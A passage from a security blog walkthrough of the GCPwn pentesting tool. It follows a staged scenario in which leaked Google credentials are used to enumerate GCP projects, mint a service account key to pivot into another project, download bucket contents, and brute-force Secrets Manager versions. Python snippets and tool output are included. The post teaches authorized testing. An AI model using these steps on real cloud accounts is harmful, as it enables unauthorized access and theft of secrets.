An Introduction to GCPwn – Parts 2 and 3

Example exploit path using GCPwn covering enumeration, brute forcing Secrets Manager versions, and downloading data from Cloud Storage both through the default enum_buckets module and with HMAC keys.

Part 2

Having covered authentication and modules in Part 1 of this blog, I’ll begin to walk through some example exploit scenarios in Parts 2 & 3. Note that I presented a similar scenario at fwd:cloudsec 2024, albeit with fewer modules shown. 

NOTE: NONE OF THE PLAINTEXT CREDENTIALS IN THIS BLOG WORK 🙂 

This attack path will cover the following steps: 

  • Step 0: The Breach Premise 
  • Step 1: Setting Up Email/Password Credentials 
  • Step 2: Launch GCPwn with ADC Credentials 
  • Quick Overview of Next Steps: Generate Service Account Key  
  • Step 3: Reconnaissance in “my-private-test-project-430102” 
  • Step 4: Pivoting to “staging-project-1-426001” via SA Key 
  • Quick Overview of Next Steps: Get HMAC key From SecretsManager to then Enumerate Bucket via SigV4 Format 
  • Step 5: Enumerate, Enumerate, Enumerate Again (Buckets & Secrets) 
  • Step 6: Download Bucket Content with HMAC Keys 

Step 0: The Breach

Assume you are performing a pentest on a company and get access to a user’s desktop. Looking around, you eventually stumble across “my_gmail_creds.txt”. While props can be given for the descriptive file naming convention, they would have to be taken back immediately given the following content in the text file:

Step 1: Setting Up Email/Password Credentials

The discovery of an email/password means we will go the ADC route in GCPwn, which requires running a few prep gcloud commands. You could run gcloud from within GCPwn, but we are showing it before the tool installation for simplicity’s sake. 

First, we will run “gcloud auth login” and sign in with the user credentials. 

Command Line Instructions/Response

>  gcloud auth login 

Your browser has been opened to visit: 

https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=325[TRUNCATED] 

You are now logged in as [fwdcloudsec2233@gmail.com]. 

Your current project is [None].  You can change this setting by running: 

  $ gcloud config set project PROJECT_ID 

Great! The credentials worked. It looks like the user has access to one project with the project ID shown below.  

Having successfully authenticated with the user email, let’s set the project ID via gcloud. Technically you can set it while in the tool with `projects set`, but email/password workflows tend to go more smoothly when the project is set via gcloud. 

> gcloud config set project my-private-test-project-430102  

Updated property [core/project]. 

With “gcloud auth login” successful and the project ID set, we need to run one final command to get our ADC credentials set up: gcloud auth application-default login. After running this command and signing into the GCP console once again, we should be good to proceed with GCPwn. As we will see later, adding credentials like service accounts is much simpler in that you point GCPwn at static values; ADC is a bit more involved, which is why this route is shown.

> gcloud auth application-default login 

Your browser has been opened to visit: 

https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=7640[TRUNCATED] 

Credentials saved to file: [/home/kali/.config/gcloud/application_default_credentials.json] 

These credentials will be used by any library that requests Application Default Credentials (ADC). 
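
As a quick aside, this file is exactly what Application Default Credentials resolve to: any google-auth based client, including GCPwn’s “adc” credential option, will silently pick it up. A minimal standalone sketch of that behavior, outside of GCPwn:

import google.auth
from google.auth.transport.requests import Request

# Resolves ADC: GOOGLE_APPLICATION_CREDENTIALS first, then the gcloud
# application_default_credentials.json written by the command above
credentials, project_id = google.auth.default(
    scopes=["https://www.googleapis.com/auth/cloud-platform"]
)
credentials.refresh(Request())  # exchange the stored refresh token for an access token
print(project_id, credentials.token[:15] + "...")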

Step 2: Launch GCPwn with ADC Credentials  

Having set up our authenticated gcloud CLI configuration, let’s start GCPwn and generate a credential set for our ADC credentials. To install GCPwn, follow the installation instructions in the gcpwn wiki, then launch GCPwn as shown below. Since this is the tool’s first launch, it will prompt you to define a workspace, a purely logical container to group your results. 

> python3 main.py  

[*] No workspaces were detected. Please provide the name for your first workspace below. 

> New workspace name: cool_pentesting_workspace 

[*] Workspace 'cool_pentesting_workspace' created. 

    GCPwn - https://github.com/NetSPI/gcpwn 

    Written and researched by Scott Weston of NetSPI (https://www.netspi.com/). Heavy inspiration/code snippets from Rhino Security Labs - https://rhinosecuritylabs.com/ 

    Like Pacu for AWS, the goal of this tool is to be a more pentesty tool for red team individuals or those who are less concerned with configuration statistics. 

    A wiki was created that explains all the modules/optins listed below found here: https://github.com/NetSPI/gcpwn/wiki. 

 

    GCPwn command info: 

        creds      [list] 

        creds info [<credname>]                         Get all info about current user  

        creds tokeninfo [<credname]                     Send token to tokeninfo endponit to get more details 

[TRUNCATED] 

    Other command info: 

        gcloud/bq/gsutil <command>            Run GCP CLI tool. It is recommended if you want to add a set of ADC creds while in GCPwn to run the following commands to add them at the command line 

                                                gcloud auth login 

                                                gcloud auth application-default login 

Welcome to your workspace! Type 'help' or '?' to see available commands. 

 

[*] Listing existing credentials... 

 

Submit the name or index of an existing credential from above, or add NEW credentials via Application Default Credentails (adc - google.auth.default()), a file pointing to adc credentials, a standalone OAuth2 Token, or Service credentials. See wiki for details on each. To proceed with no credentials just hit ENTER and submit an empty string.  

[1] *adc      <credential_name> [tokeninfo]                    (ex. adc mydefaultcreds [tokeninfo])  

[2] *adc-file <credential_name> <filepath> [tokeninfo]         (ex. adc-file mydefaultcreds /tmp/name2.json) 

[3] *oauth2   <credential_name> <token_value> [tokeninfo]      (ex. oauth2 mydefaultcreds ya[TRUNCATED]i3jJK)   

[4] service   <credential_name> <filepath_to_service_creds>    (ex. service mydefaultcreds /tmp/name2.json) 

[TRUNCATED] 

Input: adc leaked_adc_dev_creds 

[*] Project ID of credentials is: my-private-test-project-430102 

[*] Credentials successfuly added 

[*] Loading in ADC credentials... 

[*] Attempting to refresh the credentials using the stored refresh token. Note this is normal for brand new OAuth2 credentials added/updated. 

[*] Credentials sucessfully refreshed... 

[*] Credentials sucessfully stored/updated... 

[*] Proceeding with up-to-date ADC credentials for leaked_adc_dev_creds... 

[*] Loaded credentials leaked_adc_dev_creds 

(my-private-test-project-430102:leaked_adc_dev_creds)> 

Quick Overview of Next Steps: Generate a Service Account Key

At this point, let’s take a quick pause and look at the diagram below, which covers our next steps. After some enumeration as the fwdcloudsec user, we will see that there is nothing of note in my-private-test-project-430102. The note in Step 0 details a service account presumably in project ID “staging-project-1-426001”. Using this information, we will attempt to generate a key for that service account. This will succeed because the fwdcloudsec user has the “Service Account Keys Admin” role on the service account (although you as the attacker would not be privy to this knowledge).

Step 3: Reconnaissance in “my-private-test-project-430102” 

Having added credentials to GCPwn and set the project ID, the next steps will usually be enumerate, enumerate, enumerate.  

We want to find out, as the fwdcloudsec user: 

  1. What resources we have access to in this project 
  2. What permissions our user has in the project 

As shown below we will: 

  1. Run creds info before any enumeration, which will return an empty set of permissions for the fwdcloudsec user. 
  2. Run creds tokeninfo to send our access token to the tokeninfo endpoint and get back the token’s scopes and email. Note you can manually set a credential email from within GCPwn; we are just calling tokeninfo here for the sake of demonstrating the feature. 
  3. Run creds info again, which will show that the additional scopes/email have been added to the credentials profile. 
  4. Run enum_all --iam, which will run ALL the enumeration modules. The “--iam” flag will also run testIamPermissions on organizations, folders, projects, buckets, functions, etc., which returns more enumerated permissions overall. We will add a “--txt” flag to save the output to a text file for later review if needed. 
  5. Run creds info again, which will reveal what permissions fwdcloudsec might have. Many permissions are returned because enum_resources (which is included in enum_all) enumerates projects/folders/organizations, and passing in “--iam” runs testIamPermissions at the project level (a standalone sketch of that call follows this list). For those familiar with AWS, this is synonymous with enumerating permissions at the AWS account level. GCPwn highlights dangerous or notable permissions in red, as shown in the screenshot below. 
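
For context, the project-level permission check behind the “--iam” flag comes down to the Resource Manager testIamPermissions API: you submit a list of candidate permissions and the API returns the subset the caller actually holds. A rough standalone sketch of that call (the candidate list here is a small illustrative subset, not what GCPwn actually submits):

import google.auth
from google.auth.transport.requests import AuthorizedSession

credentials, _ = google.auth.default(
    scopes=["https://www.googleapis.com/auth/cloud-platform"]
)
session = AuthorizedSession(credentials)

project_id = "my-private-test-project-430102"
candidates = [  # illustrative subset only
    "resourcemanager.projects.getIamPolicy",
    "iam.serviceAccountKeys.create",
    "storage.hmacKeys.create",
]

resp = session.post(
    f"https://cloudresourcemanager.googleapis.com/v1/projects/{project_id}:testIamPermissions",
    json={"permissions": candidates},
)
print(resp.json().get("permissions", []))  # permissions the caller actually has
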
(my-private-test-project-430102:leaked_adc_dev_creds)> creds info 

Summary for leaked_adc_dev_creds: 

Email: None 

Scopes: 

    - N/A 

Default Project: my-private-test-project-430102 

All Projects: 

    - my-private-test-project-430102 

Access Token: ya29.a0AXooCgtX4[REDACTED] 

(my-private-test-project-430102:leaked_adc_dev_creds)> creds tokeninfo 

[*] Checking credentials against https://oauth2.googleapis.com/tokeninfo endpoint... 

[*] Succeeded in querying tokeninfo. The response is shown below: 

{'azp': '764[TRUNCATED].apps.googleusercontent.com', 'aud': '764[TRUNCATED]apps.googleusercontent.com', 'sub': '1057[TRUNCATED]', 'scope': 'https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/sqlservice.login https://www.googleapis.com/auth/userinfo.email openid', 'exp': '1721533307', 'expires_in': '3506', 'email': 'fwdcloudsec2233@gmail.com', 'email_verified': 'true', 'access_type': 'offline'} 

(my-private-test-project-430102:leaked_adc_dev_creds)> creds info 

Summary for leaked_adc_dev_creds: 

Email: fwdcloudsec2233@gmail.com 

Scopes: 

    - https://www.googleapis.com/auth/cloud-platform (See, edit, configure, and delete your Google Cloud data and see the email address for your Google Account.) 

    - https://www.googleapis.com/auth/sqlservice.login 

    - https://www.googleapis.com/auth/userinfo.email 

    - openid 

Default Project: my-private-test-project-430102 

All Projects: 

    - my-private-test-project-430102 

Access Token: ya29.a0AXooCgtX4[REDACTED] 

(my-private-test-project-430102:leaked_adc_dev_creds)> modules run enum_all --iam --txt /tmp/enum_all_txt_output_my-private-test-project-430102.txt 

[*]--------------------------------------------------------------------------------------------------------[*] 

[***********] Beginning enumeration for my-private-test-project-430102 [***********] 

[*]--------------------------------------------------------------------------------------------------------[*] 

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[*] Searching Organizations 

[*] Searching All Projects 

[*] Searching All Folders 

[*] Getting remainting projects/folders via recursive folder/project list calls starting with org node if possible 

[*] NOTE: This might take a while depending on the size of the domain 

[SUMMARY] GCPwn found or retrieved NO Organization(s) 

[SUMMARY] GCPwn found or retrieved NO Folder(s) 

[SUMMARY] GCPwn found 1 Project(s) 

   - projects/765211561384 (My Private Test Project) - ACTIVE                                                                                                                                

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking my-private-test-project-430102 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project my-private-test-project-430102 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in my-private-test-project-430102 

[*] Checking Cloud Compute Project my-private-test-project-430102... 

[X] STATUS 403: Compute API does not appear to be enabled for project my-private-test-project-430102 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking my-private-test-project-430102 for functions... 

[X] 403 The Cloud Functions API is not enabled for projects/my-private-test-project-430102/locations/- 

[SUMMARY] GCPwn found or retrieved NO Function(s) in my-private-test-project-430102 

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[*] Checking my-private-test-project-430102 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in my-private-test-project-430102 

[*] Checking my-private-test-project-430102 for buckets/blobs via LIST buckets... 

[SUMMARY] GCPwn found or retrieved NO Buckets (with up to 10 blobs shown each) in my-private-test-project-430102 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking my-private-test-project-430102 for service accounts... 

[SUMMARY] GCPwn found or retrieved NO Service Account(s) in my-private-test-project-430102 

[*] Checking my-private-test-project-430102 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for my-private-test-project-430102 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

(my-private-test-project-430102:leaked_adc_dev_creds)> creds info 

Summary for leaked_adc_dev_creds: 

Email: fwdcloudsec2233@gmail.com 

Scopes: 

    - https://www.googleapis.com/auth/cloud-platform (See, edit, configure, and delete your Google Cloud data and see the email address for your Google Account.) 

    - https://www.googleapis.com/auth/sqlservice.login 

    - https://www.googleapis.com/auth/userinfo.email 

    - openid 

Default Project: my-private-test-project-430102 

All Projects: 

    - my-private-test-project-430102 

Access Token: ya29.a0AXooCgss[REDACTED] 

[******] Permission Summary for leaked_adc_dev_creds [******] 

- Project Permissions 

  - my-private-test-project-430102 

    - cloudfunctions.functions.call 

[TRUNCATED] 

    - compute.subnetworks.use 

    - compute.subnetworks.useExternalIp 

    - deploymentmanager.deployments.create 

    - iam.roles.update 

    - iam.serviceAccountKeys.create 

    - iam.serviceAccounts.actAs 

    - orgpolicy.policies.list 

    - orgpolicy.policy.get 

    - resourcemanager.hierarchyNodes.createTagBinding 

    - resourcemanager.hierarchyNodes.deleteTagBinding 

    - resourcemanager.hierarchyNodes.listEffectiveTags 

    - resourcemanager.hierarchyNodes.listTagBindings 

    - resourcemanager.projects.createBillingAssignment 

    - resourcemanager.projects.delete 

    - resourcemanager.projects.deleteBillingAssignment 

    - resourcemanager.projects.get 

    - resourcemanager.projects.getIamPolicy 

    - resourcemanager.projects.move 

    - resourcemanager.projects.setIamPolicy 

    - resourcemanager.projects.undelete 

    - resourcemanager.projects.update 

    - resourcemanager.projects.updateLiens 

[TRUNCATED] 

    - resourcemanager.tagValues.update 

    - storage.hmacKeys.create 

    - storage.hmacKeys.delete 

    - storage.hmacKeys.get 

    - storage.hmacKeys.list 

    - storage.hmacKeys.update 

Color Output

Color Schema for enum_all & Permission List

Step 4: Pivoting to “staging-project-1-426001” via Service Account Key

Having enumerated permissions/resources in the current project, let’s circle back to the note from Step 0 to see if there are any pivoting opportunities. The note mentions another service account, dev-service-account@staging-project-1-426001.iam.gserviceaccount.com, which itself contains a project ID, “staging-project-1-426001”. Thus, the service account could be a potential pivot into a different project.

We can’t see what permissions the fwdcloudsec user has over the dev-service-account service account, but we can still try to generate a service account key as a blind attempt. This will require the use of our first exploit module: “exploit_service_account_keys”.  

As a quick aside, note in the image below modules can be filtered and an info blurb exists for many of them: 

In terms of exploit_service_account_keys, we will perform the steps shown below. Namely, we will: 

  1. Run the exploit module exploit_service_account_keys with the “-h” flag to see all the options the module supports. 
  2. Successfully run exploit_service_account_keys while specifying the target service account in the format dictated by the module. Note this format includes the project ID and service account email (a standalone sketch of the underlying API call follows this list). 
  3. Leverage the new key per the success prompt to pivot to a new credential set tied to the service account key. This new credential set is saved, allowing us to drop back into it later when resuming GCPwn. 
  4. Set the project ID, as it does NOT change when swapping to the new credentials. We use projects set <project_id>. 
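
For reference, creating a key for a service account ultimately comes down to a single projects.serviceAccounts.keys.create call against the IAM API. A minimal standalone sketch of that call outside the module, using the service account from the walkthrough (the empty request body accepts the API’s default key type and algorithm):

import google.auth
from google.auth.transport.requests import AuthorizedSession

credentials, _ = google.auth.default(
    scopes=["https://www.googleapis.com/auth/cloud-platform"]
)
session = AuthorizedSession(credentials)

sa = "my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com"
resp = session.post(
    f"https://iam.googleapis.com/v1/projects/staging-project-1-426001/serviceAccounts/{sa}/keys",
    json={},  # defaults to a Google-format JSON key
)
key = resp.json()
# On success, privateKeyData holds the base64-encoded JSON key file
print(key.get("name"), "privateKeyData" in key)
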
(my-private-test-project-430102:leaked_adc_dev_creds)> modules run exploit_service_account_keys -h 

usage: main.py [-h] [--sa SA] [--sa-key SA_KEY] [--create | --disable | --enable] [--assume] [-v] 

Exploit Service Account Key 

options: 

  -h, --help       show this help message and exit 

  --sa SA          Service account to generate service credentials for in the format projects/[project_id]/serviceAccount/[email] 

  --sa-key SA_KEY  Service account to key to enable/disable 

  --create         Create SA key 

  --disable        Disable SA key 

  --enable         Enable SA key 

  --assume         Assume the new credentials once created 

  -v, --debug      Get verbose data during the module run 

(my-private-test-project-430102:leaked_adc_dev_creds)> modules run exploit_service_account_keys --sa projects/staging-project-1-426001/serviceAccounts/my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

[*]-------------------------------------------------------------------------------------------------------[*] 

> Do you want to create a new sa key or disable/enable an existing one? 

>> [1] CREATE 

>> [2] ENABLE 

>> [3] DISABLE 

> [4] Exit 

> Choose an option: 1 

> The key was successfully created. Do you want to try assuming the new credentials [y\n].y 

[*] Credentials successfully added 

Loading in Service Credentials... 

[*] Loaded credentials my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192 

[*]-------------------------------------------------------------------------------------------------------[*] 

(my-private-test-project-430102:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

(my-private-test-project-430102:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> projects set staging-project-1-426001 

[X] staging-project-1-426001 is not in the list of project_ids. Adding... 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

  staging-project-1-426001 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> creds info 

Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192: 

Email: my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: N/A 

Quick Overview of Next Steps: Get HMAC Key From SecretsManager to then Enumerate Bucket via SigV4 Format 

Again, let’s take a quick pause and look at the diagram below, which covers our next steps. Through enumeration we will identify a blob in old-development-bucket-9282734. This blob will give us a secret name but not the secret version. We will brute force all version numbers for that secret and get back a value containing HMAC keys tied to the bucket-accessor service account. These HMAC keys will then be used to download a blob from the normally blocked bucket service-account-details-2323232 via SigV4 and the Google Storage XML API. Finally, access to that bucket will give us a new service account key for deployer-service-account.

Step 5: Enumerate, Enumerate, and Enumerate Again (Buckets & Secrets) 

While we have credentials for a new service account, my-dev-service-account, we still do not know what permissions the principal has in its project. As before, we can run “enum_all” to run all the enumeration modules and see what comes back.  

Because we added another project ID to GCPwn in the previous step, the tool will prompt the user to run the selected module on either the current project ID or all project IDs. GCPwn keeps a global list of project IDs (viewable via the “projects” command) to check REGARDLESS of the current user’s permissions/presence in those projects. If you ever want to specify a subset of project IDs to run the module on, you can pass --project-ids <project_id1>,<project_id2> to most modules. Just note that choosing all projects might result in modules being run on unintended projects if they are in the global list. 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_all 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*] 

[***********] Beginning enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[*] Searching Organizations 

[*] Searching All Projects 

[*] Searching All Folders 

[-] No organizations, projects, or folders were identified. You might be restricted with regard to projects. If you know of a project name add it manually via 'projects add <project_name> from the main menu 

[*] Getting remainting projects/folders via recursive folder/project list calls starting with org node if possible 

[*] NOTE: This might take a while depending on the size of the domain 

[SUMMARY] GCPwn found or retrieved NO Organization(s) 

[SUMMARY] GCPwn found or retrieved NO Folder(s) 

[SUMMARY] GCPwn found or retrieved NO Project(s) 

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking staging-project-1-426001 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project staging-project-1-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in staging-project-1-426001 

[*] Checking Cloud Compute Project staging-project-1-426001... 

[X] STATUS 403: Compute API does not appear to be enabled for project staging-project-1-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking staging-project-1-426001 for functions... 

[X] 403 The Cloud Functions API is not enabled for projects/staging-project-1-426001/locations/- 

[SUMMARY] GCPwn found or retrieved NO Function(s) in staging-project-1-426001 

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[X] 403: The user does not have storage.hmacKeys.list permissions on bucket 

[*] Checking staging-project-1-426001 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in staging-project-1-426001 

[*] Checking staging-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing old-development-bucket-9282734 

[***] GET Bucket Object 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[**] Reviewing service-account-details-2323232exit blob counts for this bucket... 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket service-account-details-2323232 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[SUMMARY] GCPwn found 2 Buckets (with up to 10 blobs shown each) in staging-project-1-426001 

- old-development-bucket-9282734 

  - my_staging_service_key.json 

- service-account-details-2323232 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking staging-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found or retrieved NO Service Account(s) in staging-project-1-426001 

[*] Checking staging-project-1-426001 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

It looks like enum_all did find some interesting results when run on just staging-project-1-426001. Some items to note are: 

  • No secrets or secret versions were returned from this enumeration. This will be relevant later. 
  • Two buckets were identified. A blob was listed for one bucket; for the other bucket, “service-account-details-2323232”, it’s unclear whether no blobs were listed due to permissions or because the bucket is simply empty. 

Note if we forgot the bucket name from stdout above we could get enumerated data (like the bucket/blob names) via the following format: data tables <table_name> --columns <column_name1>,<column_name2>,…  [--csv <filename>].

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> data tables cloudstorage-bucketblobs --columns bucket_name,name 

bucket_name,name 

old-development-bucket-9282734,my_staging_service_key.json 

Let’s check out the one blob we can enumerate, my_staging_service_key.json. We will run enum_buckets but add the “--download” flag to download all reachable blobs. Note creds info (which also could have been run after enum_all in the previous steps) shows the additional permissions identified from the successful module run. Notice how we only have “storage.objects.list” on one of the two buckets, which explains why we can’t see the blobs in the bucket service-account-details-2323232. 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_buckets --download 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Checking staging-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing old-development-bucket-9282734 

[***] GET Bucket Object 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[***] DOWNLOAD Bucket Blobs 

[**] Reviewing service-account-details-2323232exit blob counts for this bucket... 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket service-account-details-2323232 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[SUMMARY] GCPwn found 2 Buckets (with up to 10 blobs shown each) in staging-project-1-426001 

- old-development-bucket-9282734 

  - my_staging_service_key.json 

- service-account-details-2323232 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*]-------------------------------------------------------------------------------------------------------[*] 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> creds info 

Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192: 

Email: my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: N/A 

[******] Permission Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192 [******] 

- Project Permissions 

  - staging-project-1-426001 

    - storage.buckets.list 

- Storage Actions Allowed Permissions 

  - staging-project-1-426001 

    - storage.buckets.get 

      - old-development-bucket-9282734 (buckets) 

    - storage.objects.list 

      - old-development-bucket-9282734 (buckets) 

    - storage.objects.get 

      - old-development-bucket-9282734 (buckets) 

    - storage.buckets.getIamPolicy 

      - old-development-bucket-9282734 (buckets) 

Having downloaded our data, let’s check its contents. All downloaded data (unless otherwise specified) ends up in the GatheredData folder at the root of gcpwn as seen below. 

>  tree GatheredData  

GatheredData 

└── 1_cool_pentesting_workspace 

    └── Storage 

        └── REST 

            └── staging-project-1-426001 

                └── old-development-bucket-9282734 

                    └── my_staging_service_key.json 

Reading the JSON file, we will see we are not as lucky as we had hoped.

> cat my_staging_service_key.json  

Nice try! We got docked for putting service account keys in buckets :(. I put the service account key in a special bucket "service-account-details-2323232" which is ONLY accessible to a new service account I made: "bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com". Creds for this are protected in secrets manager under the "ServiceAccountHMACKeys-388372" secrets. Think the secret version got overwritten but our script seems to still be working so not messing with it. ONLY that bucket-accessor service account should be able to access our bucket 

Apparently, the devs watched my fwd:cloudsec video and removed the credentials from this blob. Reading their message we can discern: 

  • There is a service account key in bucket service-account-details-2323232. As mentioned earlier, it does not appear that we have permissions to access the blobs in service-account-details-2323232 with our current user. 
  • Per the secret name, ServiceAccountHMACKeys-388372, it appears that Cloud Storage HMAC keys are being used to access the bucket service-account-details-2323232. If you want to learn about HMAC keys, review the documentation here. In short, HMAC keys allow a user to access GCP buckets using SigV4, with requests tied to Google’s “XML API” for Cloud Storage (this is not part of the GCP SDK; I do this in GCPwn via the requests library). Interestingly, if you are familiar with AWS SigV4, you can use the same methodology and just point at the GCP storage endpoint, and it should still work. In fact, the enum_buckets call that will be used later to enumerate bucket contents over SigV4 and the XML API sends AWS headers to the GCP endpoint but still works because the feature focuses on interoperability between the cloud providers. 
  • The HMAC keys are in a secret in Secrets Manager, although it’s unclear which version of the secret contains our HMAC keys.  

I can say for a fact that the compromised service account, my-dev-service-account, has permission to access secret version values (secretmanager.versions.access) per how I set it up. Looking back at our enum_all output, we had no secret values listed, so what gives? Well, GCPwn by default operates by first calling “List” on a resource and then following up with “Get” requests; in the absence of flags, GCPwn must rely on the response from that initial List call. Therefore, if you don’t have list permissions on the resource, which my-dev-service-account does not for Secrets Manager, GCPwn won’t appear to pick up anything. The solution is to manually pass in the resource names, skipping the List step and targeting specific secrets.   

Luckily the note above gave us the name of the secret to target. The enum_secrets module allows us to specify an integer version range along with the keyword “latest”, as opposed to having to pass in every secret version one by one. With this in mind, let’s take the secret name from the note and try to run enum_secrets with an arbitrary version range specified. Let’s also add the --download flag to download any secrets found.
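
For reference, the version brute force maps onto Secrets Manager’s accessSecretVersion call. A minimal standalone sketch of the same idea using the google-cloud-secret-manager client, trying versions 1-20 plus “latest” and skipping versions that are missing or unreadable:

from google.api_core import exceptions
from google.cloud import secretmanager

client = secretmanager.SecretManagerServiceClient()
secret = "projects/staging-project-1-426001/secrets/ServiceAccountHMACKeys-388372"

for version in [str(i) for i in range(1, 21)] + ["latest"]:
    try:
        resp = client.access_secret_version(name=f"{secret}/versions/{version}")
        print(version, resp.payload.data.decode(errors="replace"))
    except (exceptions.NotFound, exceptions.FailedPrecondition, exceptions.PermissionDenied):
        continue  # version is missing, destroyed/disabled, or blocked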

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_secrets --secrets projects/staging-project-1-426001/secrets/ServiceAccountHMACKeys-388372 --version-range 1-20,latest --download 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*] 

[**] [staging-project-1-426001] Reviewing projects/staging-project-1-426001/secrets/ServiceAccountHMACKeys-388372 

[***] GET Base Secret Entity 

[***] LIST Secret Versions 

[****] GET Secret Version 1 

[****] GETTING Secret Values For 1 

[****] SECRET VALUE RETRIEVED FOR 1 

[****] GET Secret Version 2 

[****] GETTING Secret Values For 2 

[****] SECRET VALUE RETRIEVED FOR 2 

[****] GET Secret Version 3 

[****] GETTING Secret Values For 3 

[****] SECRET VALUE RETRIEVED FOR 3 

[****] GET Secret Version 4 

[****] GETTING Secret Values For 4 

[****] SECRET VALUE RETRIEVED FOR 4 

[****] GET Secret Version 5 

[****] GETTING Secret Values For 5 

An unknown exception occurred when trying to call get_secret_version as follows: 

404 Secret Version [projects/239052134916/secrets/ServiceAccountHMACKeys-388372/versions/5] not found. 

[****] GET Secret Version 6 

[****] GETTING Secret Values For 6 

An unknown exception occurred when trying to call get_secret_version as follows: 

